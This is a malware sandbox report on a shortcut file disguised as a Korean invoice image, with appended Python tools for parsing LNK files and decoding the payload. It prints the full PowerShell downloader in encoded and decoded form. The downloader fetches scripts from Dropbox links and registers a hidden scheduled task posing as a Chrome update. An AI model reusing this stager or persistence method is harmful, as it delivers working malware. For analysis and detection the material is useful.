Summary | ZeroBOX

도양기업 20240610 송장 갑지.bmp.lnk

Tags: Antivirus, GIF Format, Lnk Format, wget, AntiVM, AntiDebug
Category FILE
Machine s1_win7_x6402
Started Aug. 26, 2024, 9:20 a.m.
Completed Aug. 26, 2024, 9:22 a.m.
Size 310.8KB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=67, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 09b1213c8a336541a4849d65b937293f
SHA256 44ff60d352169f280801cf2075295aab0a6151ff8f77b66d16c82776efce7fea
CRC32 8A2BD054
ssdeep 1536:Owj7bPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLs:Owjg
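As an added example (not part of the ZeroBOX report): the fields file(1) summarised in the Type line above come from the 76-byte ShellLinkHeader, and a shortcut's command line lives in the StringData section that follows it. The parser below reads both, and triage() flags what is notable in this sample's header: three FILETIMEs of zero (the FILETIME epoch, which file(1) renders as a date at the turn of 1600/1601), a target length of 0, and HasArguments set, which together say the shortcut carries its payload in its arguments rather than pointing at a real file. build_sample_lnk() fabricates a minimal .lnk in memory for the demonstration; it is not the analysed file, and its description, arguments, icon index and ShowCommand value are chosen here.

```python
# Added example (not from the ZeroBOX report): parse the ShellLinkHeader and
# StringData of a Windows shortcut (.lnk), the fields behind the "Type" line.
# build_sample_lnk() fabricates a minimal shortcut for the demo; it is NOT the
# analysed sample, and its strings, icon index and ShowCommand are chosen here.
import struct
from datetime import datetime, timedelta, timezone

HEADER_SIZE = 0x4C                                              # fixed 76-byte header
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
LINK_FLAGS = {                                                  # low byte of LinkFlags
    0x01: "HasLinkTargetIDList", 0x02: "HasLinkInfo", 0x04: "HasName",
    0x08: "HasRelativePath", 0x10: "HasWorkingDir", 0x20: "HasArguments",
    0x40: "HasIconLocation", 0x80: "IsUnicode",
}
# StringData entries appear in this order, each present only if its flag is set.
STRING_DATA = [("HasName", "description"), ("HasRelativePath", "relative_path"),
               ("HasWorkingDir", "working_dir"), ("HasArguments", "arguments"),
               ("HasIconLocation", "icon_location")]
SHOW_COMMAND = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}

def filetime_to_dt(ft):
    """FILETIME = 100 ns ticks since 1601-01-01 UTC. 0 means 'unset'; file(1) prints it as 1600/1601."""
    if ft == 0:
        return None
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_lnk(data):
    (size, clsid, flags, attrs, ctime, atime, wtime,
     fsize, icon, show) = struct.unpack_from("<I16sIIQQQIiI", data, 0)
    if size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link (.lnk) header")
    info = {
        "flags": [name for bit, name in LINK_FLAGS.items() if flags & bit],
        "file_attributes": attrs,
        "ctime": filetime_to_dt(ctime), "atime": filetime_to_dt(atime), "wtime": filetime_to_dt(wtime),
        "target_size": fsize, "icon_index": icon,
        "show_command": SHOW_COMMAND.get(show, hex(show)),
    }
    off = HEADER_SIZE
    if flags & 0x01:                      # LinkTargetIDList: u16 IDListSize, then the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & 0x02:                      # LinkInfo: u32 LinkInfoSize that counts itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & 0x80)
    for flag, key in STRING_DATA:         # u16 CountCharacters, then the characters (no terminator)
        if flag in info["flags"]:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            nbytes = count * 2 if unicode else count
            raw = data[off:off + nbytes]
            info[key] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
            off += nbytes
    return info

def triage(info):
    """Reviewer heuristics for a shortcut that arrived as a lure."""
    findings = []
    if info["ctime"] is None and info["atime"] is None and info["wtime"] is None:
        findings.append("all three target FILETIMEs are zero: generated, not copied from a real target")
    if info["target_size"] == 0 and "HasArguments" in info["flags"]:
        findings.append("target length 0 but HasArguments set: the payload is in the arguments")
    args = info.get("arguments", "").lower()
    if "powershell" in args and ("frombase64string" in args or " -e" in args):
        findings.append("arguments run PowerShell with an encoded payload")
    return findings

def build_sample_lnk(description, arguments):
    """Constructed .lnk: HasName|HasArguments|IsUnicode, zero FILETIMEs, size 0, icon 67, SW_SHOWMINNOACTIVE."""
    flags = 0x04 | 0x20 | 0x80
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20,          # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,       # CreationTime, AccessTime, WriteTime
                         0,             # FileSize of the (absent) target
                         67, 7,         # IconIndex, ShowCommand
                         0, 0, 0, 0)    # HotKey, Reserved1..3
    def sd(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(description) + sd(arguments) + b"\x00\x00\x00\x00"   # ExtraData terminal block

if __name__ == "__main__":
    lnk = build_sample_lnk("Invoice scan (constructed)",
                           'powershell.exe -nop -w hidden -c "[Convert]::FromBase64String($ss)"')
    info = parse_lnk(lnk)
    print(info)
    for finding in triage(info):
        print("!", finding)
```

The parser deliberately stops after StringData; a full reader would also walk the ExtraData blocks, which is where a generated shortcut often leaks the builder's machine name and MAC address (the TrackerDataBlock).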
Yara
  • Antivirus - Contains references to security software
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format

  • cmd.exe (PID 3012) "C:\Windows\System32\cmd.exe" /c start /wait "dSjKITEYXqGx" "C:\Users\test22\AppData\Local\Temp\도양기업 20240610 송장 갑지.bmp.lnk"
    • powershell.exe (PID 2204) "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIuuPhOyWkeq4sOyXhSAyMDI0MDYwOCDshqHsnqUg6rCR7KeALmJtcCI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9xdW82M3FtOGQzaXFsaG1weWliN3AvMjAyNDA2MDguYm1wP3Jsa2V5PXNicGNndWJnaTBpeGl5bm01bGJzbnE4MXAmc3Q9eWxkYnNyb3UmZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaGhoOyAkcHBwID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS82dzkwdGxybndtajgzNTM3ZTltZDcvMDYxMHNhZmUteC50eHQ/cmxrZXk9ZDZjZWR2dGVvazNreWVwbmZweHRuM2k5aSZzdD15YjRqendzMCZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJHBwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2luZG93U3R5bGUgSGlkZGVuIC1ub3AgIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxlIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1Db21tYW5kICImIHskYWJjID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lLnBzMVwiOyAmICRhYmM7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZUNvcmVUYXNrTWFjaGluZUtPUiIgLUFjdGlvbiAkYWN0aW9uIC1UcmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICAkYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd2dldCAtVXJpICJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5jb20vc2NsL2ZpL3M3ZDZhd2lkNTh4cjg5aHRsbnl5Yy8wNjEwc2FmZS1mLnR4dD9ybGtleT1lcXhiY2gyMW5pbGhnd29ydHl3MHhiYmk5JnN0PXd3Y3RzeWIyJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
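As an added example (not part of the ZeroBOX report): decoding the stager carried in the PowerShell command line above and listing its indicators. Two facts from the console output further down frame what this sandbox run did and did not see. The decoded script downloads with `wget`, the alias of Invoke-WebRequest that exists only in PowerShell 3.0 and later, and persists with New-ScheduledTaskAction/Register-ScheduledTask from the ScheduledTasks module, which ships with Windows 8 / Server 2012 and later; on this Windows 7 machine both came back "not recognized", so no download, no scheduled task and "No hosts contacted" describe the analysis VM, not the sample. Note also that the decoy name inside the stager is dated 20240608 while the lure shortcut is dated 20240610. CMDLINE below is the command line as recorded in this report; the regexes, result keys and helper names are this example's own.

```python
# Added example (not from the ZeroBOX report): decode the stager carried in the
# PowerShell command line above and list its indicators. CMDLINE is the command
# line as recorded in this report; regexes, result keys and helper names are
# this example's own.
import base64
import re

CMDLINE = (
    r'"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop '
    r'-NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"'
    "JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIuuPhOyWkeq4sOyXhSAyMDI0MDYwOCDshqHsnqUg6rCR7KeALmJtcCI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9xdW82M3FtOGQzaXFsaG1weWliN3AvMjAyNDA2MDguYm1wP3Jsa2V5PXNicGNndWJnaTBpeGl5bm01bGJzbnE4MXAmc3Q9eWxkYnNyb3UmZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaGhoOyAkcHBwID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS82dzkwdGxybndtajgzNTM3ZTltZDcvMDYxMHNhZmUteC50eHQ/cmxrZXk9ZDZjZWR2dGVvazNreWVwbmZweHRuM2k5aSZzdD15YjRqendzMCZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJHBwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2luZG93U3R5bGUgSGlkZGVuIC1ub3AgIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxlIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1Db21tYW5kICImIHskYWJjID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lLnBzMVwiOyAmICRhYmM7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZUNvcmVUYXNrTWFjaGluZUtPUiIgLUFjdGlvbiAkYWN0aW9uIC1UcmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICAkYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd2dldCAtVXJpICJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5jb20vc2NsL2ZpL3M3ZDZhd2lkNTh4cjg5aHRsbnl5Yy8wNjEwc2FmZS1mLnR4dD9ybGtleT1lcXhiY2gyMW5pbGhnd29ydHl3MHhiYmk5JnN0PXd3Y3RzeWIyJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7"
    r'\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));'
    r'$cc = $env:appdata;$dd = \"user.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; '
    r'$aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"'
)

BLOB_RE   = re.compile(r'\$ss\s*=\s*\\?"([A-Za-z0-9+/=]+)\\?"')       # $ss =\"....\" (outer layer)
PS1_RE    = re.compile(r'\\?"([^"\\]+\.ps1)\\?"')                       # script the outer layer drops
URL_RE    = re.compile(r"https?://[^\s\"']+")
DROP_RE   = re.compile(r'Join-Path\s*\((?:\$env:AppData|\[System\.IO\.Path\]::GetTempPath\(\))\)'
                       r'\s*\\?"([^"\\]+)\\?"', re.I)                   # files the stager writes
TASK_RE   = re.compile(r'Register-ScheduledTask\s+-TaskName\s+"([^"]+)"', re.I)
FIRST_RE  = re.compile(r'\.AddMinutes\((\d+)\)', re.I)
REPEAT_RE = re.compile(r'New-TimeSpan\s+-Minutes\s+(\d+)', re.I)
ALIAS_RE  = re.compile(r'\b(wget|curl|iwr)\s+-Uri', re.I)              # Invoke-WebRequest aliases, PS 3.0+

def unique(items):
    """Order-preserving de-duplication (chrome.ps1 is named twice in the script)."""
    out = []
    for item in items:
        if item not in out:
            out.append(item)
    return out

def decode_stager(cmdline):
    """The stager does UTF8.GetString(FromBase64String($ss)); mirror that. This is
    plain base64 of UTF-8 text, not the UTF-16LE that -EncodedCommand would carry."""
    m = BLOB_RE.search(cmdline)
    if not m:
        raise ValueError("no $ss base64 blob in command line")
    return base64.b64decode(m.group(1), validate=True).decode("utf-8")

def extract_iocs(script):
    task, first, repeat = TASK_RE.search(script), FIRST_RE.search(script), REPEAT_RE.search(script)
    return {
        "urls": unique(URL_RE.findall(script)),
        "dropped": unique(DROP_RE.findall(script)),
        "task_name": task.group(1) if task else None,
        "schedule": {"first_run_minutes": int(first.group(1)) if first else None,
                     "repeat_minutes": int(repeat.group(1)) if repeat else None},
        "needs_ps3_aliases": bool(ALIAS_RE.search(script)),
    }

def analyse(cmdline):
    script = decode_stager(cmdline)
    result = {"outer_drop": unique(PS1_RE.findall(cmdline)), "script": script}
    result.update(extract_iocs(script))
    return result

if __name__ == "__main__":
    r = analyse(CMDLINE)
    for key in ("outer_drop", "dropped", "urls", "task_name", "schedule", "needs_ps3_aliases"):
        print(f"{key}: {r[key]}")
```

The "needs_ps3_aliases" flag is the triage shortcut for the failure seen in this run: a stager that calls `wget`/`curl`/`iwr` aborts on a Windows 7 host with the default PowerShell 2.0, and a detonation there says nothing about the second-stage payloads.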

Name  Response  Post-Analysis Lookup
No hosts contacted.

IP Address  Status  Action
164.124.101.2  Active  Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API  Arguments  [Status Return Repeated]
GetComputerNameW  computer_name: TEST22-PC  [1 1 0]
GetComputerNameW  computer_name: TEST22-PC  [1 1 0]
GetComputerNameW  computer_name: TEST22-PC  [1 1 0]
GetComputerNameW  computer_name: TEST22-PC  [1 1 0]
GetComputerNameW  computer_name: TEST22-PC  [1 1 0]
GetComputerNameW  computer_name: TEST22-PC  [1 1 0]
GetComputerNameA  computer_name: TEST22-PC  [1 1 0]
GetComputerNameW  computer_name: TEST22-PC  [1 1 0]

Time & API  Arguments  [Status Return Repeated]
IsDebuggerPresent  (no arguments)  [0 0]

Time & API  Arguments  [Status Return Repeated]
WriteConsoleW  console_handle: 0x00000027  buffer: The term 'wget' is not recognized as the name of a cmdlet, function, script fil  [1 1 0]
WriteConsoleW  console_handle: 0x00000033  buffer: e, or operable program. Check the spelling of the name, or if a path was includ  [1 1 0]
WriteConsoleW  console_handle: 0x0000003f  buffer: ed, verify that the path is correct and try again.  [1 1 0]
WriteConsoleW  console_handle: 0x0000004b  buffer: At C:\Users\test22\AppData\Roaming\user.ps1:1 char:83  [1 1 0]
WriteConsoleW  console_handle: 0x00000057  buffer: + $hhh = Join-Path ([System.IO.Path]::GetTempPath()) "도양기업 20240608 송장 갑지.bmp";  [1 1 0]
WriteConsoleW  console_handle: 0x00000063  buffer: wget <<<< -Uri "https://dl.dropboxusercontent.com/scl/fi/quo63qm8d3iqlhmpyib7  [1 1 0]
WriteConsoleW  console_handle: 0x0000006f  buffer: p/20240608.bmp?rlkey=sbpcgubgi0ixiynm5lbsnq81p&st=yldbsrou&dl=0" -OutFile $hhh;  [1 1 0]
WriteConsoleW  console_handle: 0x0000007b  buffer: & $hhh; $ppp = Join-Path ($env:AppData) "chrome.ps1"; $str = '$aaa = Join-Path  [1 1 0]
WriteConsoleW  console_handle: 0x00000087  buffer: ($env:AppData) "temp.ps1"; wget -Uri "https://dl.dropboxusercontent.com/scl/fi  [1 1 0]
WriteConsoleW  console_handle: 0x00000093  buffer: /6w90tlrnwmj83537e9md7/0610safe-x.txt?rlkey=d6cedvteok3kyepnfpxtn3i9i&st=yb4jzw  [1 1 0]
WriteConsoleW  console_handle: 0x0000009f  buffer: s0&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;'; $str | Out-Fil  [1 1 0]
WriteConsoleW  console_handle: 0x000000ab  buffer: e -FilePath $ppp -Encoding UTF8; $action = New-ScheduledTaskAction -Execute 'Po  [1 1 0]
WriteConsoleW  console_handle: 0x000000b7  buffer: werShell.exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -  [1 1 0]
WriteConsoleW  console_handle: 0x000000c3  buffer: ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps  [1 1 0]
WriteConsoleW  console_handle: 0x000000cf  buffer: 1\"; & $abc;}"'; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMi  [1 1 0]
WriteConsoleW  console_handle: 0x000000db  buffer: nutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-Schedu  [1 1 0]
WriteConsoleW  console_handle: 0x000000e7  buffer: ledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "ChromeUpdateCoreT  [1 1 0]
WriteConsoleW  console_handle: 0x000000f3  buffer: askMachineKOR" -Action $action -Trigger $trigger -Settings $settings; $aaa = J  [1 1 0]
WriteConsoleW  console_handle: 0x000000ff  buffer: oin-Path ($env:AppData) "system_first.ps1"; wget -Uri "https://dl.dropboxuserco  [1 1 0]
WriteConsoleW  console_handle: 0x0000010b  buffer: ntent.com/scl/fi/s7d6awid58xr89htlnyyc/0610safe-f.txt?rlkey=eqxbch21nilhgwortyw  [1 1 0]
WriteConsoleW  console_handle: 0x00000117  buffer: 0xbbi9&st=wwctsyb2&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;  [1 1 0]
WriteConsoleW  console_handle: 0x00000123  buffer: + CategoryInfo : ObjectNotFound: (wget:String) [], CommandNotFoun  [1 1 0]
WriteConsoleW  console_handle: 0x0000012f  buffer: dException  [1 1 0]
WriteConsoleW  console_handle: 0x0000013b  buffer: + FullyQualifiedErrorId : CommandNotFoundException  [1 1 0]
WriteConsoleW  console_handle: 0x00000023  buffer: The term 'C:\Users\test22\AppData\Local\Temp\도양기업 20240608 송장 갑지.bmp' is not re  [1 1 0]
WriteConsoleW  console_handle: 0x0000002f  buffer: cognized as the name of a cmdlet, function, script file, or operable program. C  [1 1 0]
WriteConsoleW  console_handle: 0x0000003b  buffer: heck the spelling of the name, or if a path was included, verify that the path  [1 1 0]
WriteConsoleW  console_handle: 0x00000047  buffer: is correct and try again.  [1 1 0]
WriteConsoleW  console_handle: 0x00000053  buffer: At C:\Users\test22\AppData\Roaming\user.ps1:1 char:232  [1 1 0]
WriteConsoleW  console_handle: 0x0000005f  buffer: + $hhh = Join-Path ([System.IO.Path]::GetTempPath()) "도양기업 20240608 송장 갑지.bmp";  [1 1 0]
WriteConsoleW  console_handle: 0x0000006b  buffer: wget -Uri "https://dl.dropboxusercontent.com/scl/fi/quo63qm8d3iqlhmpyib7p/2024  [1 1 0]
WriteConsoleW  console_handle: 0x00000077  buffer: 0608.bmp?rlkey=sbpcgubgi0ixiynm5lbsnq81p&st=yldbsrou&dl=0" -OutFile $hhh; & <<<  [1 1 0]
WriteConsoleW  console_handle: 0x00000083  buffer: < $hhh; $ppp = Join-Path ($env:AppData) "chrome.ps1"; $str = '$aaa = Join-Path  [1 1 0]
WriteConsoleW  console_handle: 0x0000008f  buffer: ($env:AppData) "temp.ps1"; wget -Uri "https://dl.dropboxusercontent.com/scl/fi  [1 1 0]
WriteConsoleW  console_handle: 0x0000009b  buffer: /6w90tlrnwmj83537e9md7/0610safe-x.txt?rlkey=d6cedvteok3kyepnfpxtn3i9i&st=yb4jzw  [1 1 0]
WriteConsoleW  console_handle: 0x000000a7  buffer: s0&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;'; $str | Out-Fil  [1 1 0]
WriteConsoleW  console_handle: 0x000000b3  buffer: e -FilePath $ppp -Encoding UTF8; $action = New-ScheduledTaskAction -Execute 'Po  [1 1 0]
WriteConsoleW  console_handle: 0x000000bf  buffer: werShell.exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -  [1 1 0]
WriteConsoleW  console_handle: 0x000000cb  buffer: ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps  [1 1 0]
WriteConsoleW  console_handle: 0x000000d7  buffer: 1\"; & $abc;}"'; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMi  [1 1 0]
WriteConsoleW  console_handle: 0x000000e3  buffer: nutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-Schedu  [1 1 0]
WriteConsoleW  console_handle: 0x000000ef  buffer: ledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "ChromeUpdateCoreT  [1 1 0]
WriteConsoleW  console_handle: 0x000000fb  buffer: askMachineKOR" -Action $action -Trigger $trigger -Settings $settings; $aaa = J  [1 1 0]
WriteConsoleW  console_handle: 0x00000107  buffer: oin-Path ($env:AppData) "system_first.ps1"; wget -Uri "https://dl.dropboxuserco  [1 1 0]
WriteConsoleW  console_handle: 0x00000113  buffer: ntent.com/scl/fi/s7d6awid58xr89htlnyyc/0610safe-f.txt?rlkey=eqxbch21nilhgwortyw  [1 1 0]
WriteConsoleW  console_handle: 0x0000011f  buffer: 0xbbi9&st=wwctsyb2&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;  [1 1 0]
WriteConsoleW  console_handle: 0x0000012b  buffer: + CategoryInfo : ObjectNotFound: (C:\Users\test22...40608 송장 갑지.b  [1 1 0]
WriteConsoleW  console_handle: 0x00000137  buffer: mp:String) [], CommandNotFoundException  [1 1 0]
WriteConsoleW  console_handle: 0x00000143  buffer: + FullyQualifiedErrorId : CommandNotFoundException  [1 1 0]
WriteConsoleW  console_handle: 0x00000167  buffer: The term 'New-ScheduledTaskAction' is not recognized as the name of a cmdlet, f  [1 1 0]

Time & API  Arguments  [Status Return Repeated]
CryptExportKey, 50 calls, each with buffer: <INVALID POINTER>, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6  [1 1 0]
crypto_handle per call, in order (count in parentheses): 0x00299400 (1), 0x00299340 (3), 0x00299640 (6), 0x00298c00 (3), 0x002998c0 (3), 0x00299980 (1), 0x002998c0 (7), 0x00299180 (14), 0x00298f40 (12)

Time & API  Arguments  [Status Return Repeated]
GlobalMemoryStatusEx  (no arguments)  [1 1 0]

Time & API  Arguments  [Status Return Repeated]
Common to every row below: process_identifier: 2204, process_handle: 0xffffffff, stack_dep_bypass: 0, stack_pivoted: 0, protection: 64 (PAGE_EXECUTE_READWRITE)  [1 0 0]
NtAllocateVirtualMemory  region_size: 2097152  heap_dep_bypass: 0  base_address: 0x029c0000  allocation_type: 8192 (MEM_RESERVE)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02b80000  allocation_type: 4096 (MEM_COMMIT)
NtProtectVirtualMemory  length: 4096  heap_dep_bypass: 0  base_address: 0x73921000
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x0272a000  allocation_type: 4096 (MEM_COMMIT)
NtProtectVirtualMemory  length: 8192  heap_dep_bypass: 0  base_address: 0x73922000
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02722000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02732000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02b81000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 8192  heap_dep_bypass: 1  base_address: 0x02b82000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x0279a000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02733000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02734000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x027ab000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x027a7000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x0272b000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02792000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x027a5000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02735000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x0279c000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02b70000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02736000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x027ac000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02793000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02794000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02795000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02796000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02797000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02798000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x02799000  allocation_type: 4096 (MEM_COMMIT)
